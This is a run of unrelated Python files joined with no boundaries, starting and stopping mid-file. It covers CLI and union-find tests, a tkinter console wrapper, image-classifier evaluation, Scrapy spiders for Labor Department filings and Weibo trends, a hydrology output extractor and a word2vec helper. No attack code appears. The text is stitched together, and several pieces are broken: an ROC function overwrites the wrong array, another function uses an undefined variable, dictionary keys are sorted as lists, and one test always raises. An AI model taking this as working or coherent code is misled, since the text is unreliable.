Quincy: error Tom: $500 """ class CreditCardTest(unittest.TestCase): def test_output(self): output = subprocess.check_output( ['credit-card', 'test/fixtures/input.txt'], universal_newlines=True ) self.assertEqual(EXPECTED_OUTPUT, output) import struct import chain def apply(receiver, code, action): contract = chain.s2n('calltest1') args = struct.pack('QQ', contract, 1) ret = chain.call_contract('helloworld12', args) print('+++call contract return:', len(ret), ret) ret = int.from_bytes(ret, 'little') print(ret) assert ret == 2 Fakor/HojDoj import tkinter as tk import subprocess import queue import os from threading import Thread class Console(tk.Frame): def __init__(self,parent=None): tk.Frame.__init__(self, parent) self.parent = parent self.create_widgets() # get the path to the console.py file assuming it is in the same folder console_path = os.path.join(os.path.dirname(__file__),"console.py") # open the console.py file (replace the path to python with the correct one for your system) # e.g. it might be "C:\\Python35\\python" self.p = subprocess.Popen(["python3",console_path], stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE) # make queues for keeping stdout and stderr whilst it is transferred between threads self.outQueue = queue.Queue() self.errQueue = queue.Queue() # keep track of where any line that is submitted starts self.line_start = 0 # make the enter key call the self.enter function self.ttyText.bind("",self.enter) # a daemon to keep track of the threads so they can stop running self.alive = True # start the functions that get stdout and stderr in separate threads Thread(target=self.read_from_proccess_out).start() Thread(target=self.read_from_process_err).start() # start the write loop in the main thread self.write_loop() self.pack(fill=tk.BOTH, expand=True) def destroy(self): """ This is the function that is automatically called when the widget is destroyed. """ self.alive=False # write exit() to the console in order to stop it running self.p.stdin.write("exit()\n".encode()) self.p.stdin.flush() # call the destroy methods to properly destroy widgets self.ttyText.destroy() tk.Frame.destroy(self) def enter(self,e): """ The key press handler """ string = self.ttyText.get(1.0, tk.END)[self.line_start:] self.line_start+=len(string) self.p.stdin.write(string.encode()) self.p.stdin.flush() def read_from_proccess_out(self): """ To be executed in a separate thread to make read non-blocking """ while self.alive: data = self.p.stdout.raw.read(1024).decode() self.outQueue.put(data) def read_from_process_err(self): """ To be executed in a separate thread to make read non-blocking """ while self.alive: data = self.p.stderr.raw.read(1024).decode() self.errQueue.put(data) def write_loop(self): """ Used to write data from stdout and stderr to the Text widget """ # if there is anything to write from stdout or stderr, then write it if not self.errQueue.empty(): self.write(self.errQueue.get()) if not self.outQueue.empty(): self.write(self.outQueue.get()) # run this method again after 10ms if self.alive: self.after(10, self.write_loop) def write(self,string): self.ttyText.insert(tk.END, string) self.ttyText.see(tk.END) self.line_start+=len(string) def create_widgets(self): self.ttyText = tk.Text(self, wrap=tk.WORD) self.ttyText.pack(fill=tk.BOTH,expand=True) if __name__ == '__main__': root = tk.Tk() root.config(background="red") main_window = Console(root) main_window.pack(fill=tk.BOTH,expand=True) root.mainloop()0 class Resource(object): def __init__(self, uri, params = None) -> None: self.uri = uri if not params: self.params = dict() else: self.params = paramsimport tensorflow as tf from tensorflow.keras.preprocessing.image import ImageDataGenerator from tensorflow.keras.wrappers.scikit_learn import KerasClassifier from sklearn.metrics import confusion_matrix from sklearn.metrics import auc, roc_curve from pathlib import Path import seaborn as sb import matplotlib.pyplot as plt import numpy as np import pandas as pd import sqlite3 from PIL import Image from scipy import interpolate import matplotlib.image as mplimg from cif3r.data import recycling_guidelines from cif3r.models.predict_model import clf_factory from cif3r.models.train_model import macro_f1, macro_f1_loss from cif3r.features import preprocessing PARENT_DIR = Path(__file__).resolve().parents[2] KAGGLE_DATA_PATH = PARENT_DIR / 'data/raw/DATASET/TEST' MODEL_DIR = PARENT_DIR / 'models' VIZ_DIR= PARENT_DIR / 'reports/figures' DEPS = {'macro_f1_loss': macro_f1_loss, 'macro_f1': macro_f1} def prediction_mapping(university: str): try: clf = tf.keras.models.load_model( MODEL_DIR / f"{university}.h5", custom_objects=DEPS ) except OSError: raise Exception( f"Unable to find model. Valid models include {MODEL_DIR.glob('*.h5')}" ) df = preprocessing.datagen(university, balance_classes=False, verify_paths=True) df = df.sample(n=int(len(df) / 10), random_state=42) images = ImageDataGenerator().flow_from_dataframe(df, batch_size=64) y_hat = list(clf.predict(images)) df["y_hat"] = y_hat return {"df": df, "labels": images.class_indices} def plot_confusion_matrix(university: str): """For kaggle data, prediction class is organized by folder structure, but for scraped data, sql metadata is used.""" preds = prediction_mapping(university) df = preds["df"] df["y_hat"] = df["y_hat"].map(lambda x: np.where(x == np.amax(x))[0][0]) df["y_hat"] = df["y_hat"].map(lambda x: list(preds["labels"].keys())[x]) print(df.head()) labels = list(preds['labels'].keys()) con_mat = confusion_matrix(df['class'], df['y_hat'], labels=labels) figure = plt.figure(figsize=(10,8)) con_mat_df = pd.DataFrame(con_mat, index=labels, columns=labels) sb.heatmap(con_mat_df, annot=True, cmap=plt.cm.Blues) plt.tight_layout() plt.xlabel("True label") plt.ylabel("Predicted label") plt.savefig(VIZ_DIR / f"{university}_confusion_matrix.png") def plot_roc(university:str): """Creates ROC curve from average ROC value for each class""" preds = prediction_mapping(university) df = preds["df"] df["y_hat"] = df["y_hat"].map(lambda x: np.where(x == np.amax(x))[0][0]) df["y_test"] = df["class"].map(lambda x: preds['labels'][x]) labels = list(preds['labels'].values()) fpr = dict() tpr = dict() roc_auc = dict() for label in labels: y_hat = np.zeros(len(preds['df'])) y_test = np.zeros(len(preds['df'])) for i, (true, pred) in enumerate(df[['y_test', 'y_hat']].itertuples(index=False)): if true == label: y_test[i] = 1 if pred == label: y_test[i] = 1 print(y_hat, y_test) fpr[label], tpr[label], _ = roc_curve(y_test, y_hat) roc_auc[label] = auc(fpr[label], tpr[label]) print(roc_auc) plt.figure() plt.plot([0, 1], [0, 1], 'k--') plt.plot( fpr[label], tpr[label], label=f'ROC score for {i}: {roc_auc[label]}' ) plt.xlabel('False positive rate') plt.ylabel('True positive rate') plt.title('ROC curve') plt.legend(loc='best') plt.savefig(VIZ_DIR / f"{university}_roc.png") def plot_image_predictions(university:str): fig, axes = plt.subplots(nrows=2, ncols=2, figsize=(20,5)) for i, img, ax in zip(range(4), imgs.values(), axes): img_array = mplimg.imread(img) classes = [key for key in imgs.keys()] y_hat = clf_factory(university, img_array, classes) plt.imshow(img_array) ax.set_title(f'Predicted Class: {y_hat}.\n Actual Class {classes[i]}') plt.savefig('/home/dal/CIf3R/reports/img_predictions.png') def make_visualizations(): for university in recycling_guidelines.UNIVERSITIES.keys(): plot_roc(university) if __name__ == "__main__": make_visualizations() from collections import deque def cin(): return list(map(int, input().split())) n, q = cin() graph = [[] for _ in range(n + 1)] for i in range(n - 1): a, b = cin() graph[a].append(b) graph[b].append(a) query = [cin() for _ in range(q)] dist = [-1 for _ in range(n + 1)] dist[0] = 0 dist[1] = 0 d = deque() d.append(1) while d: v = d.popleft() for i in graph[v]: if dist[i] != -1: continue dist[i] = dist[v] + 1 d.append(i) for i in range(q): distance = dist[query[i][0]] + dist[query[i][1]] if distance % 2 == 0: print('Town') else: print('Road') from scrapy import Spider from scrapy.http import FormRequest class Employers(Spider): name = "employers" custom_settings = { 'ITEM_PIPELINES': { 'lm20.pipelines.Nullify': 1, 'lm20.pipelines.TitleCase': 2, 'lm20.pipelines.StandardDate': 3, } } def start_requests(self): return [ FormRequest("https://olmsapps.dol.gov/olpdr/GetLM2021FilerListServlet", formdata={'clearCache': 'F', 'page': '1'}, cb_kwargs={'page': 1}, callback=self.parse) ] def parse(self, response, page): """ @url https://olmsapps.dol.gov/olpdr/GetLM2021FilerListServlet @filers_form @cb_kwargs {"page": 0} @returns requests 501 501 """ filers = response.json()['filerList'] for filer in filers: yield FormRequest("https://olmsapps.dol.gov/olpdr/GetLM2021FilerDetailServlet", formdata={'srNum': 'C-' + str(filer['srNum'])}, callback=self.parse_filings) if len(filers) == 500: page += 1 yield FormRequest("https://olmsapps.dol.gov/olpdr/GetLM2021FilerListServlet", formdata={'clearCache': 'F', 'page': str(page)}, cb_kwargs={'page': page}, callback=self.parse) def parse_filings(self, response): """ @url https://olmsapps.dol.gov/olpdr/GetLM2021FilerDetailServlet @filings_form @returns request 1 """ for filing in response.json()['detail']: yield FormRequest('https://olmsapps.dol.gov/olpdr/GetAdditionalEmpsServlet', formdata={'rptId': str(filing['rptId'])}, callback=self.parse_employer) def parse_employer(self, response): """ @url https://olmsapps.dol.gov/olpdr/GetAdditionalEmpsServlet @employers_form @returns items 1 """ employer_fields = ('rptId', 'empLabOrg', 'empTrdName', 'city', 'state', 'termDate', 'amount') for employer in response.json()['detail']: item = {field: employer[field] for field in employer_fields} yield item linzhlalala/self-critical.pytorch import json # retina_file_name = 'data/retinatinytalk.json' retina_file_name = 'data/retina_tiny_eval.json' with open(retina_file_name) as retina_json_file: retina_dataset = json.load(retina_json_file) print(retina_dataset.keys())godoggyo/AutoWordle import fileinput as fi from queue import Empty import random ### Word list arrays TODO: Add weights for auto solvers ### ### Maybe make am ore complex list using native unix dic ### word_list = [] MISS = "X" CONTAINS = "-" CORRECT = "#" def establishWordPool(): if word_list is not Empty: f = fi.input(files="files/dict.txt") for line in f: line = line.strip("\n") word_list.append(line) f.close() def selectWord(): return random.choice(word_list) ### Print functions for game turns ### def gameStart(): print("You have 5 tries left:") print(MISS + " " + MISS + " " + MISS + " " + MISS + " " + MISS) def userInput(): guess = input("Enter Guess: ") return guess def letterCheck(letterList, word): for i in range(len(letterList)): if letterList[i] == word[i]: print(CORRECT) else: print(MISS)100-1000 # Copyright (c) Microsoft Corporation. # Licensed under the MIT license. from typing import List from maro.backends.frame import NodeAttribute, NodeBase, node @node("regions") class Region(NodeBase): """Region node definition in frame.""" id = NodeAttribute("i2") total_machine_num = NodeAttribute("i") empty_machine_num = NodeAttribute("i") def __init__(self): self._id: int = 0 self._total_machine_num: int = 0 self._name: str = "" self._zone_list: List[int] = [] def set_init_state(self, id: int, total_machine_num: int): """Set initialize state, that will be used after frame reset. Args: id (int): Region id. """ self._id = id self._total_machine_num = total_machine_num self.reset() def reset(self): """Reset to default value.""" self.id = self._id self.total_machine_num = self._total_machine_num self.empty_machine_num = self.total_machine_num @property def zone_list(self) -> List[int]: return self._zone_list @zone_list.setter def zone_list(self, zone_list: List[int]): self._zone_list = zone_list @property def name(self) -> str: return self._name @name.setter def name(self, name: str): self._name = name tests/test_main.py0 from proto.main import ProtoTest def test_proto(tmp): with ProtoTest() as app: res = app.run() print(res) raise Exception def test_command1(tmp): argv = ['command1'] with ProtoTest(argv=argv) as app: app.run() 1-10 # Extract output.rch similar to observed_rch.txt struction in nsga2.in folder import sys, datetime, os import codecs # ----------------- Class ------------------ class SWAT: def __init__(self, SWATtxtinoutFolderDirectory): self.__dir = SWATtxtinoutFolderDirectory # Read file. cio to get begining date and end date SWAT = codecs.open(os.path.join(SWATtxtinoutFolderDirectory, "file.cio"), "r", encoding="utf-8") lines = SWAT.readlines() skipyear = int(lines[59][12:16]) FCbeginyear = int(lines[8][12:16]) + skipyear # begining year FCendyear = FCbeginyear + int(lines[7][12:16]) - 1 - int(lines[59][12:16]) # ending year if skipyear == 0: FCbeginday = int(lines[9][12:16]) # begining julian day else: FCbeginday = 1 # begining julian day FCendday = int(lines[10][12:16]) # ending julian day SWAT.close() FCbegindate = datetime.datetime(FCbeginyear, 1, 1) + datetime.timedelta(FCbeginday - 1) FCenddate = datetime.datetime(FCendyear, 1, 1) + datetime.timedelta(FCendday - 1) self.__fcbegindate = FCbegindate self.__fcenddate = FCenddate def DefineTimePeriod(self, BeginDate, EndDate): """Date Format: "m/d/yyyy" """ self.__begindate = (datetime.datetime.strptime(BeginDate, "%m/%d/%Y")) self.__enddate = (datetime.datetime.strptime(EndDate, "%m/%d/%Y")) def ReadDailySWATrchfile(self, OutletSubbasinNumber, columnNumber): """ saves the rch file column and corresponding date columnNumber=0 for area and 1 for the next and so on""" SWAT_Directory = self.__dir # Get file.cio dates FCbegindate = self.__fcbegindate FCenddate = self.__fcenddate # Get defined dates BD = self.__begindate ED = self.__enddate # Check if the date range of the SWAT run covers the defined date range if FCbegindate > BD: sys.exit("Error: The begin date in observed_rch.txt is earlier than SWAT run time span.") if FCenddate < ED: sys.exit("Error: The end date in observed_rch.txt is later than SWAT run time span.") # Read output.rch to get outflow SWAT = codecs.open(os.path.join(SWAT_Directory, "output.rch"), "r", encoding='utf-8') SWATlines = SWAT.readlines() Date_Value = {} date = FCbegindate for line in range(9, len(SWATlines)): if float(SWATlines[line][6:11:]) == OutletSubbasinNumber: # get the values for outlet subbasin outflow = float(SWATlines[line][(columnNumber * 12 + 26):(columnNumber * 12 + 26 + 12):]) Date_Value[date] = outflow date = date + datetime.timedelta(days=1) SWAT.close() # Get the values between defined date thedate = BD ddate = []; dailystreamflow = [] while thedate != ED + datetime.timedelta(days=1): ddate += [thedate] dailystreamflow += [Date_Value[thedate]] thedate = thedate + datetime.timedelta(days=1) # Get array values for daily streamflow self.get_DailyDate = ddate self.get_DailyStreamflow = dailystreamflow # Convert dictionary (Date_value) to array (date and value)---used up in the class def DictionaryofDate_valuetoArrays(Date_value): """Returns (array): date, value """ date = Date_value.keys() date.sort() value = [] for d in date: value.append(Date_value[d]) return date, value # Read 'observed_rch.txt' f = codecs.open(os.path.join(os.getcwd(), "NSGA2.IN", "observed_rch.txt"), "r", encoding='utf-8') lines = f.readlines() # Read Observed Streamflow Outlet_Obsorder = {}; outlet = -99; nofdatapoint = -99; begindate = -99; enddate = -99; ColumnNo = -99 for i in range(0, len(lines)): try: if lines[i][0:10:] == 'output_rch': outlet = int(lines[i][11:16].split(" ")[0]) nofdatapoint = int(lines[i + 1].split(" ")[0]) begindate = lines[i + 2].split(" ")[0].split("|")[0] enddate = lines[i + 2].split(" ")[0].split("|")[1] ColumnNo = int(lines[i + 2].split(" ")[0].split("|")[2]) Obsorder = [] for j in range((i + 3), (i + 3 + nofdatapoint)): Obsorder.append(float(lines[j].split("\t")[0])) Outlet_Obsorder[outlet] = Obsorder except: sys.exit("ERROR: check the 'observed_rch.txt' file (the gage on line:" + str(i) + ")") outlets = Outlet_Obsorder.keys() outlets.sort() mlines = "" for outlet in outlets: # Read output.rch sw = SWAT("./") sw.DefineTimePeriod(begindate, enddate) sw.ReadDailySWATrchfile(outlet, ColumnNo) # (OutletSubbasinNumber,columnNumber) simstrflw = sw.get_DailyStreamflow # Get model.out lines for i1 in Outlet_Obsorder[outlet]: i = int(i1) - 1 mlines += str(i + 1) + " " + str(simstrflw[i]) + "\n" # Print the model.out file f = codecs.open(os.path.join(os.getcwd(), "model.out"), "w") f.writelines(mlines) f.close() print("Extraction is done for outlets: ", outlets) # -*- coding: utf-8 -*- import json import re import time from random import choice from urllib.parse import urlencode import scrapy from Hotspot.items import WeiboItem from Hotspot.static import Source from utils.spider_headers import USER_AGENT_LIST from utils.tools import get_md5 class WeiBoHotspotSpider(scrapy.Spider): name = 'weibo' url = 'https://s.weibo.com/top/summary' base_url = 'https://s.weibo.com' def start_requests(self): url = 'https://passport.weibo.com/visitor/genvisitor' data = { 'cb': 'gen_callback' } yield scrapy.FormRequest(url=url, formdata=data, method='post', callback=self.get_sub_data) def get_sub_data(self, response): url = 'https://passport.weibo.com/visitor/visitor?' params = { 'a': 'incarnate', 't': self.get_tid_str(response.text), 'w': 3, 'c': 100, 'cb': 'cross_domain', 'from': 'weibo', } url = url + urlencode(params) yield scrapy.Request(url=url, callback=self.get_weibo_top_summary) def get_weibo_top_summary(self, response): sub_dict = self.get_sub_dict(response.text) sub = sub_dict.get('sub') subp = sub_dict.get('subp') headers = { 'User-Agent': choice(USER_AGENT_LIST), 'Cookie': f"SUB={sub}; SUBP={subp}" } yield scrapy.Request(url=self.url, headers=headers, callback=self.parse) def parse(self, response): node_list = response.xpath(".//div[@class='data']//tr[position()>1]") for node in node_list: value_str = node.xpath(".//td[@class='td-02']/span/text()").extract_first().strip() if not value_str: continue item = WeiboItem() item['title'] = node.xpath(".//td[@class='td-02']/a/text()").extract_first().strip() item['value'] = re.findall(r"\d+", value_str)[0] item['timestamp'] = int(time.time() * 1000) item['title_md5'] = get_md5(item['title']) item['source'] = Source.WEIBO.value link_href_to = node.xpath(".//td[@class='td-02']/a/@href_to").extract_first() if link_href_to: item['link'] = self.base_url + link_href_to.strip() else: item['link'] = self.base_url + node.xpath(".//td[@class='td-02']/a/@href").extract_first().strip() yield item def get_tid_str(self, str_data): results = re.findall(r'gen_callback\((.+?)\);', str_data) if results: json_data = results[0] data_dict = json.loads(json_data) return data_dict['data']['tid'] return None def get_sub_dict(self, str_data): results = re.findall(r'cross_domain\((.+?)\);', str_data) if results: json_data = results[0] data_dict = json.loads(json_data) return data_dict['data'] return {} Code-by-practice/python-syntax-reference # Open terminal > python3 classEg6.py # Start typing below commands and see the output class A: name = 'A' def getName(self): return self.name class B(A): name = 'B' # Override class A's name def getName(self): return self.name b = B() print(b.getName()) from unittest.mock import patch import pytest from webmention.models import WebMentionResponse @pytest.fixture def test_response_body(): return "foo" @pytest.mark.django_db def test_str(test_source, test_target, test_response_body): webmention = WebMentionResponse.objects.create( source=test_source, response_to=test_target, response_body=test_response_body ) webmention.save() assert str(webmention) == webmention.source @pytest.mark.django_db def test_source_for_admin(test_source, test_target, test_response_body): webmention = WebMentionResponse.objects.create( source=test_source, response_to=test_target, response_body=test_response_body ) webmention.save() assert webmention.source_for_admin() == '{href}'.format(href=webmention.source) @pytest.mark.django_db def test_response_to_for_admin(test_source, test_target, test_response_body): webmention = WebMentionResponse.objects.create( source=test_source, response_to=test_target, response_body=test_response_body ) webmention.save() assert webmention.response_to_for_admin() == '{href}'.format(href=webmention.response_to) @patch("webmention.models.WebMentionResponse.save") def test_invalidate_when_not_previously_saved(mock_save): webmention = WebMentionResponse() webmention.invalidate() assert not mock_save.called @pytest.mark.django_db def test_invalidate_when_previously_saved(test_source, test_target, test_response_body): webmention = WebMentionResponse.objects.create( source=test_source, response_to=test_target, response_body=test_response_body ) webmention.save() webmention.invalidate() assert not webmention.current @patch("webmention.models.WebMentionResponse.save") def test_update_when_previously_invalid(mock_save, test_source, test_target, test_response_body): webmention = WebMentionResponse.objects.create(source="foo", response_to="bar", response_body="baz", current=False) assert mock_save.call_count == 1 webmention.update(test_source, test_target, test_response_body) assert webmention.current assert webmention.source == test_source assert webmention.response_to == test_target assert webmention.response_body == test_response_body assert mock_save.call_count == 2 import os import glob def _single_glob(pattern): """Returns the file matching a given pattern. An error is raised if no file/multiple files match the pattern Parameters ---------- pattern : str The pattern to match. Returns ------- output : str or None The filename if existant. """ filenames = glob.glob(pattern) if not filenames: raise ValueError('Non exitant file with pattern {}'.format(pattern)) if len(filenames) > 1: raise ValueError('Non unique file with pattern {}'.format(pattern)) return filenames[0] def load_heroes_dataset( subjects=None, subjects_parent_directory='/volatile/asl_data/heroes/raw', dataset_pattern={'anat': 't1mri/acquisition1/anat*.nii', 'basal ASL': 'fMRI/acquisition1/basal_rawASL*.nii', 'basal CBF': 'B1map/acquisition1/basal_relCBF*.nii'} ): """Loads the NeuroSpin HEROES dataset. Parameters ---------- subjects : sequence of int or None, optional ids of subjects to load, default to loading all subjects. subjects_parent_directory : str, optional Path to the dataset folder containing all subjects folders. dataset_pattern : dict, optional Input dictionary. Keys are the names of the images to load, values are strings specifying the unique relative pattern specifying the path to these images within each subject directory. Returns ------- dataset : dict The absolute paths to the images for all subjects. Keys are the same as the files_patterns keys, values are lists of strings. """ # Absolute paths of subjects folders subjects_directories = [os.path.join(subjects_parent_directory, name) for name in sorted(os.listdir(subjects_parent_directory)) if os.path.isdir(os.path.join( subjects_parent_directory, name))] max_subjects = len(subjects_directories) if subjects is None: subjects = range(max_subjects) else: if max(subjects) > max_subjects: raise ValueError('Got {0} subjects, you provided ids {1}' ''.format(max_subjects, str(subjects))) subjects_directories = [subjects_directories[subject_id] for subject_id in subjects] # Build the path list for each image type dataset = {} for (image_type, file_pattern) in dataset_pattern.iteritems(): dataset[image_type] = [] for subject_dir in subjects_directories: dataset[image_type].append( _single_glob(os.path.join(subject_dir, file_pattern))) return dataset 0 import unittest from congeries.src import QuickFindUF from congeries.src import QuickUnionUF from congeries.src import WeightedQuickUnionUF from congeries.src import WeightedQuickUnionPathCompressionUF class TestQuickFind(unittest.TestCase): def test_type(self): uf = QuickFindUF(10) self.assertIsInstance(uf, QuickFindUF) def test_array_init(self): uf = QuickFindUF(10) self.assertEqual(uf.id, list(range(10))) def test_union(self): uf = QuickFindUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1), (8, 9), (5, 0), (7, 2), (6, 1), (1, 0), (6, 7)] expected_ids = [ [0, 1, 2, 3, 3, 5, 6, 7, 8, 9], [0, 1, 2, 8, 8, 5, 6, 7, 8, 9], [0, 1, 2, 8, 8, 5, 5, 7, 8, 9], [0, 1, 2, 8, 8, 5, 5, 7, 8, 8], [0, 1, 1, 8, 8, 5, 5, 7, 8, 8], [0, 1, 1, 8, 8, 5, 5, 7, 8, 8], [0, 1, 1, 8, 8, 0, 0, 7, 8, 8], [0, 1, 1, 8, 8, 0, 0, 1, 8, 8], [1, 1, 1, 8, 8, 1, 1, 1, 8, 8], [1, 1, 1, 8, 8, 1, 1, 1, 8, 8], [1, 1, 1, 8, 8, 1, 1, 1, 8, 8], ] for (p, q), expected in zip(union_seq, expected_ids): uf.union(p, q) self.assertEqual(uf.id, expected) def test_components_count_10(self): uf = QuickFindUF(10) self.assertEqual(uf.components_count, 10) def test_components_count_7(self): """ [0, 1, 2, 8, 8, 5, 5, 7, 8, 9] """ uf = QuickFindUF(10) union_seq = [(4, 3), (3, 8), (6, 5)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 7) def test_components_count_5(self): """ [0, 1, 1, 8, 8, 5, 5, 7, 8, 8] """ uf = QuickFindUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 5) def test_components_count_also_5(self): """ [0, 1, 1, 8, 8, 5, 5, 7, 8, 8] """ uf = QuickFindUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1), (8, 9)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 5) def test_components_count_2(self): """ [1, 1, 1, 8, 8, 1, 1, 1, 8, 8] """ uf = QuickFindUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1), (8, 9), (5, 0), (7, 2), (6, 1), (1, 0), (6, 7)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 2) class TestQuickUnion(unittest.TestCase): def test_type(self): uf = QuickUnionUF(10) self.assertIsInstance(uf, QuickUnionUF) def test_components_count_10(self): uf = QuickUnionUF(10) self.assertEqual(uf.components_count, 10) def test_union(self): uf = QuickUnionUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1), (8, 9), (5, 0), (7, 2), (6, 1), (1, 0), (6, 7)] expected_ids = [ [0, 1, 2, 3, 3, 5, 6, 7, 8, 9], [0, 1, 2, 8, 3, 5, 6, 7, 8, 9], [0, 1, 2, 8, 3, 5, 5, 7, 8, 9], [0, 1, 2, 8, 3, 5, 5, 7, 8, 8], [0, 1, 1, 8, 3, 5, 5, 7, 8, 8], [0, 1, 1, 8, 3, 5, 5, 7, 8, 8], [0, 1, 1, 8, 3, 0, 5, 7, 8, 8], [0, 1, 1, 8, 3, 0, 5, 1, 8, 8], [1, 1, 1, 8, 3, 0, 5, 1, 8, 8], [1, 1, 1, 8, 3, 0, 5, 1, 8, 8], [1, 1, 1, 8, 3, 0, 5, 1, 8, 8], ] for (p, q), expected in zip(union_seq, expected_ids): uf.union(p, q) self.assertEqual(uf.id, expected) def test_components_count_7(self): uf = QuickUnionUF(10) union_seq = [(4, 3), (3, 8), (6, 5)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 7) def test_components_count_5(self): uf = QuickUnionUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 5) def test_components_count_also_5(self): uf = QuickUnionUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1), (8, 9)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 5) def test_components_count_2(self): uf = QuickUnionUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1), (8, 9), (5, 0), (7, 2), (6, 1), (1, 0), (6, 7)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 2) class TestWeightedQuickUnion(unittest.TestCase): def test_type(self): uf = WeightedQuickUnionUF(10) self.assertIsInstance(uf, QuickUnionUF) def test_components_count_10(self): uf = WeightedQuickUnionUF(10) self.assertEqual(uf.components_count, 10) def test_union(self): uf = WeightedQuickUnionUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1), (8, 9), (5, 0), (7, 2), (6, 1), (1, 0), (6, 7)] expected_ids = [ [0, 1, 2, 4, 4, 5, 6, 7, 8, 9], [0, 1, 2, 4, 4, 5, 6, 7, 4, 9], [0, 1, 2, 4, 4, 6, 6, 7, 4, 9], [0, 1, 2, 4, 4, 6, 6, 7, 4, 4], [0, 2, 2, 4, 4, 6, 6, 7, 4, 4], [0, 2, 2, 4, 4, 6, 6, 7, 4, 4], [6, 2, 2, 4, 4, 6, 6, 7, 4, 4], [6, 2, 2, 4, 4, 6, 6, 2, 4, 4], [6, 2, 6, 4, 4, 6, 6, 2, 4, 4], [6, 2, 6, 4, 4, 6, 6, 2, 4, 4], [6, 2, 6, 4, 4, 6, 6, 2, 4, 4], ] for (p, q), expected in zip(union_seq, expected_ids): uf.union(p, q) self.assertEqual(uf.id, expected) def test_components_count_7(self): uf = WeightedQuickUnionUF(10) union_seq = [(4, 3), (3, 8), (6, 5)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 7) def test_components_count_5(self): uf = WeightedQuickUnionUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 5) def test_components_count_also_5(self): uf = WeightedQuickUnionUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1), (8, 9)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 5) def test_components_count_2(self): uf = WeightedQuickUnionUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1), (8, 9), (5, 0), (7, 2), (6, 1), (1, 0), (6, 7)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 2) class TestWeightedQuickUnionPathCompression(unittest.TestCase): def test_type(self): uf = WeightedQuickUnionPathCompressionUF(10) self.assertIsInstance(uf, QuickUnionUF) def test_components_count_10(self): uf = WeightedQuickUnionPathCompressionUF(10) self.assertEqual(uf.components_count, 10) def test_union(self): uf = WeightedQuickUnionPathCompressionUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1), (8, 9), (5, 0), (7, 2), (6, 1), (1, 0), (6, 7)] expected_ids = [ [0, 1, 2, 4, 4, 5, 6, 7, 8, 9], [0, 1, 2, 4, 4, 5, 6, 7, 4, 9], [0, 1, 2, 4, 4, 6, 6, 7, 4, 9], [0, 1, 2, 4, 4, 6, 6, 7, 4, 4], [0, 2, 2, 4, 4, 6, 6, 7, 4, 4], [0, 2, 2, 4, 4, 6, 6, 7, 4, 4], [6, 2, 2, 4, 4, 6, 6, 7, 4, 4], [6, 2, 2, 4, 4, 6, 6, 2, 4, 4], [6, 2, 6, 4, 4, 6, 6, 2, 4, 4], [6, 6, 6, 4, 4, 6, 6, 2, 4, 4], [6, 6, 6, 4, 4, 6, 6, 6, 4, 4], ] for (p, q), expected in zip(union_seq, expected_ids): uf.union(p, q) self.assertEqual(uf.id, expected) def test_components_count_7(self): uf = WeightedQuickUnionPathCompressionUF(10) union_seq = [(4, 3), (3, 8), (6, 5)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 7) def test_components_count_5(self): uf = WeightedQuickUnionPathCompressionUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 5) def test_components_count_also_5(self): uf = WeightedQuickUnionPathCompressionUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1), (8, 9)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 5) def test_components_count_2(self): uf = WeightedQuickUnionPathCompressionUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1), (8, 9), (5, 0), (7, 2), (6, 1), (1, 0), (6, 7)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 2) if __name__ == '__main__': unittest.main() baileythegreen/conTEXT-explorer import gensim from gensim.models.phrases import Phrases, Phraser import pandas as pd from gensim.test.utils import datapath from gensim.models import Word2Vec import sys def train_model(corpus_name): processed_file_name = "./topic_model/"+corpus_name+"/processed_content_" + corpus_name + '.pkl' sentences=pd.read_pickle(processed_file_name).body.values.tolist()[0] phrases = Phrases(sentences, min_count=10, progress_per=10000) bigram = Phraser(phrases) sentences = bigram[sentences] model = gensim.models.Word2Vec( sentences, size=200, # the size of the dense vector to represent each token window=50, # +/- "window" number of words are counted as neighbors min_count=1, # minimium frequency count of words workers=10, # the number of threads to use behind the scenes iter=20 # number of iterations over the corpus ) model.save("./topic_model/"+corpus_name+"/"+corpus_name+".model") return True def find_similar(corpus_name, term_list,top_n=50): model = Word2Vec.load("./topic_model/"+corpus_name+"/"+corpus_name+".model") top_term_list=[] for term in term_list: if len(term.split())>1:#a phrase term_list.append("_".join(term.split())) term_list.remove(term) # print(term_list) for i in model.wv.most_similar(positive=term_list, topn=top_n): top_term_list.append(i) # print(top_term_list) return top_term_list # -*- coding: utf-8 -*- from gui.mainnb import 